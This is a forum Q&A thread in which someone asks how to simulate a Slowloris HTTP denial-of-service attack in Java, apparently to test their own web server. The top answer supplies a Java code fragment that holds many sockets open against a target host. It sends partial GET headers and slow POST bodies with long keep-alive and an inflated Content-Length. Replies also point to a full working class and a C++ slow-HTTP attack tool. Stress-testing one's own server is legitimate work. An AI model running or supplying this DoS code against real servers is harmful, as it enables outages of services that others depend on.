# Java - Simulate Slowloris HTTP DoS attack

Tags: java, perl, load, ddos

I need to write java code test that will simulate Slowloris HTTP DoS attack on my web server.
I've found a perl code that does that: http://ha.ckers.org/slowloris/

My environment is not constant, meaning i can't guarantee an active-perl installed on the machine.
is there another way to do that?
is there a way to use jerl (https://code.google.com/p/jerl/) to do that without an active-perl installation (maybe I can add the needed liberaries to my java project?)?

Answer (score 2):

```
switch (dosMethod) {
        case GET:
            while(!StopWorking)
            {
                for(int i=0;i<per_Thread;i++)
                {
                    if(socks[i].isConnected())
                    {
                    try
                    {
                        PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
                        pw.println("GET / HTTP/1.1");
                        pw.println("Host: " + hp.getHostText());
                        pw.println();
                        pw.flush();
                    }
                    catch (Exception e){}
                    }
                    else
                    {
                        try {
                            socks[i] = new Socket(InetAddress.getByName(hp.getHostText()), hp.getPort());
                        } catch (IOException e) {
                            e.printStackTrace();
                        }
                    }
                }
            }
            break;
        case POST:
            for(int i=0;i<per_Thread;i++)
            {
                try {
                    socks[i].close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            while(!StopWorking)
            {
                for(int i=0;i<per_Thread;i++)
                {
                    if(socks[i].isConnected())
                    {
                        try {
                            PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
                            pw.println();
                        } catch (IOException e) {
                            e.printStackTrace();
                        }
                    }
                    else
                    {
                        try {
                            socks[i] = new Socket(InetAddress.getByName(hp.getHostText()), hp.getPort());
                            PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
                            pw.println("POST / HTTP/1.1");
                            pw.println("User-Agent: %s");
                            pw.println("Connection: keep-alive");
                            pw.println("Keep-Alive: 900");
                            pw.println("Content-Length: 10000");
                            pw.println("Content-Type: application/x-www-form-urlencoded");
                            pw.println();
                            pw.flush();
                        } catch (IOException e) {
                            e.printStackTrace();
                        }
                    }
                }
            }
            break;
    }
```

where socks is an Array of Sockets (Socket[] socks = new Socket[connsperthread];

Comment: Working class on https://gist.github.com/luvarqpp/ca66c4d3a2d743cd61c734901550ff4b (edit queue was full, so unable to fix class here).

Answer (score 0):

you can use this implementation writen in c++ https://community.qualys.com/blogs/securitylabs/2011/08/25/new-open-source-tool-for-slow-http-attack-vulnerabilities